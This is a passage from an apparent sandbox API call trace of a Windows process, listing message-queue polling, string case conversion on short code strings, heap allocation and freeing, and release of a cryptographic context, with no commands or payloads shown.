wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.188] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.188] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.188] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.188] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.189] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.189] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.189] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.189] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.189] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.195] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.195] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.195] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.195] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.196] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.196] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.196] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.196] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.196] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.196] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.196] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.196] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.196] CryptDestroyKey (hKey=0xaa5860) returned 1 [0256.196] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.196] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.196] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.196] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.197] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.197] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.197] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.197] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.197] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.197] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.197] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.197] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.197] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.197] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.197] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.197] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.197] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.197] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.197] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.198] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.198] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.198] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.198] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.198] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.199] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.199] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.199] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.199] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.199] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.199] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.199] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.199] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.199] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.199] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.200] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.200] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.200] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.200] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.202] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.202] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.203] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.203] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.204] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.204] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.204] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.205] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.205] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 